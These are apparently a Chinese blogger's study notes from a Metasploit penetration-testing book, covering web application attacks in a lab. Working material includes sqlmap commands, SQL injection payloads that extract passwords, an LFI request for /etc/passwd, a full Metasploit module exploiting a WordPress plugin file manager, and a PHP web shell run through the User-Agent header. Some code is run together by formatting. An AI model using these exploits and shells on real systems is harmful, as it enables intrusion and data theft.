《Metasploit渗透测试魔鬼训练营》笔记 Web 应用渗透
文章目录
- web应用缺陷
- OWASP web 漏洞TOP10
- Metasploit的Web应用渗透技术
- web应用漏洞扫描
- 开源工具
- W3AF
- SQL注入
- sqlmap
- 注入
- 跨站脚本攻击
- autopwn
- 命令注入攻击
- 创建自己的模块
- 文件包含攻击
- 扫描wordpress用wpscan,joomla用joomscan
web应用缺陷
- 广泛性
- 技术门槛低
- 防火墙可绕过性
- 安全机制不够成熟
- 隐蔽性
- 变化性
- 利益性
OWASP web 漏洞TOP10
- SQl注入攻击
- 跨站脚本
- 跨站伪造请求
- 绘画认证管理缺陷
- 安全误配置
- 不安全密码存储
- 不安全的对象参考
- 限制URL访问失败
- 缺乏传输层保护
- 未验证的重定向和跳转
Metasploit的Web应用渗透技术
- 辅助模块
msf > load wmap
> help
> # 使用wmap扫描
> wmap_sites -a http://xxxx
> wmap_sites -l
> wmap_targets -t http://xxx
> wmap_run -t
> wmap_run -e # 查看结果
> vulns # 查看漏洞
# HTTP Trace Method Allowed
- 渗透模块
exploit/unix/webappexploit/windows/httpexploit/multi/http
| 工具名 | 功能描述 | 备注 |
|---|---|---|
| W3AF | 综合性Web应用扫描和审计工具 | |
| SQLMap | SQL注入 | |
| wXf | 开源web渗透测试框架 | 与msf结构相同 |
| XSSF | 跨站脚本分析 | |
| BeEF | 浏览器攻击平台框架 |
web应用漏洞扫描
开源工具
- Arachni
- Grabber-Scan
- Wapiti
- Zed Attack Proxy
- Skipfish
- W3AF
- Sandcat Free Edition
- Paros
- Burp suite Free
- WATOBO
W3AF
- 发现类模块 查找HTTP信息,探测服务器、数据库、Web应用防火墙。webSpider,基于爬虫技术爬取网站的每个链接和表单。
- 暴力破解模块
- 审计模块 用来探测漏洞的模块
- 修改模块
- 攻击模块
- 输出模块
- Evasion 用来绕过入侵检测
# 安装
git clone --depth 1 https://gitee.com/duaneya/w3af.git
cd w3af
./w3af_guiSQL注入
sqlmap
admin' or '1=1 # 登入
# SQLmap
msf > sqlmap -u 'http://xxx' --cookie='' # 使用tamperdata插件
> sqlmap -u '' --cookie='' --dbs -v 0
> # 发现dvwa,information_schema数据库
> -D dvwa --tables
> # 得到guestbook,users
> -D dvwa --tables -T users --columns
> -dump 导出-u 单个URL -m xx.txt 多个URL
-d "mysql://user:password@10.10.10.137:3306/dvwa" 作为服务器客户端,直接连接数据库
--data post/get都适用
-p 指定扫描的参数
-r 读取文件
-f 指纹信息
--tamper 混淆脚本,用于应用层过滤
--cookie --user-agent --host等等http头的修改
--threads 并发线程 默认为1
--dbms MySQL<5.0> 指定数据库或版本–level=LEVEL 执行测试的等级(1-5,默认为 1)
–risk=RISK 执行测试的风险(0-3,默认为 1) Risk升高可造成数据被篡改等风险
–current-db / 获取当前数据库名称
–dbs 枚举数据库管理系统数据库
–tables 枚举 DBMS 数据库中的表
–columns 枚举 DBMS 数据库表列
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
常用的tamper本地:sqlmap-tamper分类.xlsxbase64encode.py #转为b64编码
charencode.py url编码
chardoubleencode.py 双URL编码
unmagicquotes.py 宽字节
randomcomments.py 用/**/分割SQL关键字
space2plus.py space2comment.py space2xxxx.py 替换空格为xx
注入
注意结尾空格
| 输入 | 输出 |
|---|---|
' | |
1' | |
1'' | |
' or '1=1 | |
' union select 1,2 --' | |
' union select 1,table_name from INFORMATION_SCHEMA.tables -- ' | |
' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- ' | |
' union select null,password from users -- ' | |
union select password,concat(first_name,' ',last_name,' ',user) from users -- ' |
跨站脚本攻击
autopwn
msf > use auxiliary/server/browser_autopwn
> set LHOST xxx
> set SRVHOST xxx
> set SRVPORT xxx
> exploit
> jobs
> sessions
> sessions -i 1命令注入攻击
创建自己的模块
- 使用 reload重载当前模块
- 模块名必须小写,用
_隔开单词 - 使用
reload_all重新载入全部 - 使用
edit编辑当前模块
/usr/share/metasploit-framework/modules/exploits/unix/webapp/wordpress_zabbix_plugin_new.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::Tcpinclude Msf::Exploit::Remote::HttpClientdef initialize(info = {})super(update_info(info,'Name' => 'Wordpress ','Description' => %q{jkjkl},'Author' =>['Unknown', # Identify yourself || send an PR here],'License' => MSF_LICENSE,'References' =>[],'Privileged' => false,'Payload' =>{'DisableNops' => true,'Compat' =>{'ConnectionType' => 'find',},'Space' => 500},'Platform' => 'php','Arch' => ARCH_PHP,'Targets' => [['Automatic', {}]],'DisclosureDate' => 'Oxx','DefaultTarget' => 0))register_options([OptString.new('URI', [true, 'uri', '/']),], self.class)enddef exploiturl = datastore['URI']remotehost = datastore['RHOST']res = send_request_cgi({'method' => 'GET','uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php",})directory = res.body.scan(/currentFolderPath" value="([^"]*)"/)code = "selectedDoc[]=#{payload.encoded}¤tFolderPath=#{directory.first.first}"res = send_request_cgi({'method' => 'POST','uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php",'data' => "#{code}",})cookie = res.headers['Set-Cookie'].split(";")dirname = Rex::Text.rand_text_alpha(8)res = send_request_cgi({'method' => 'POST','uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php",'data' => "new_folder=#{dirname}¤tFolderPath=#{directory.first.first}",})filename = Rex::Text.rand_text_alpha(8)res = send_request_cgi({'method' => 'POST','uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php",'cookie' => "#{cookie[0]}",'data' => "value=#{filename}&id=#{directory.first.first}#{dirname}",})while(1)print "#"cmd = getsif cmd.include?("exit")breakendres = send_request_cgi({'method' => 'GET','uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/data.php",'agent' => "#{Rex::Text.encode_base64("#{cmd}")}\r\n",})data = res.body.split("_code_")[1]puts data.split(")[0]endend
end
/usr/share/metasploit-framework/modules/payloads/singles/php/shell_php.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'module MetasploitModuleCachedSize = :dynamicinclude Msf::Payload::Singleinclude Msf::Payload::Phpdef initialize(info = {})super(merge_info(info,'Name' => 'PHP Shell','Description' => 'zzzzzzzz','Author' => 'egypt','License' => BSD_LICENSE,'Platform' => 'php','Arch' => ARCH_PHP,))end## Issues# - Since each command is executed in a new shell, 'cd' does nothing.# Perhaps it should be special-cased to call chdir()# - Tries to get around disable_functions but makes no attempts to# circumvent safe mode.#def php_shellshell = <<-END_OF_PHP_CODE<?php error_reporting(1);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_USER_AGENT]));die; ?>END_OF_PHP_CODEreturn Rex::Text.compress(shell)enddef generatereturn php_shellend
end
文件包含攻击
http://10.10.10.129/dvwa/vulnerabilities/fi/?page=/etc/passwd
如果Apache服务器配置了allow_url_include,可以直接使用远程url。
扫描wordpress用wpscan,joomla用joomscan
_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.1Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://10.10.10.129/wordpress/ [10.10.10.129]
[+] Started: Wed May 13 14:05:10 2020Interesting Finding(s):[+] Headers| Interesting Entries:| - Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1| - X-Powered-By: PHP/5.3.2-1ubuntu4.5| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.10.129/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:| - http://codex.wordpress.org/XML-RPC_Pingback_API| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] http://10.10.10.129/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://10.10.10.129/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.10.129/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:| - https://www.iplocation.net/defend-wordpress-from-ddos| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 3.3.1 identified (Insecure, released on 2012-01-03).| Found By: Meta Generator (Passive Detection)| - http://10.10.10.129/wordpress/, Match: 'WordPress 3.3.1'| Confirmed By: Atom Generator (Aggressive Detection)| - http://10.10.10.129/wordpress/?feed=atom, <generator uri="http://wordpress.org/" version="3.3.1">WordPress</generator>[i] The main theme could not be detected.[+] Enumerating Vulnerable Plugins (via Passive Methods)[i] No plugins Found.[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up[+] Finished: Wed May 13 14:05:33 2020
[+] Requests Done: 29
[+] Cached Requests: 4
[+] Data Sent: 7.946 KB
[+] Data Received: 50.355 KB
[+] Memory used: 97.496 MB
[+] Elapsed time: 00:00:22
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!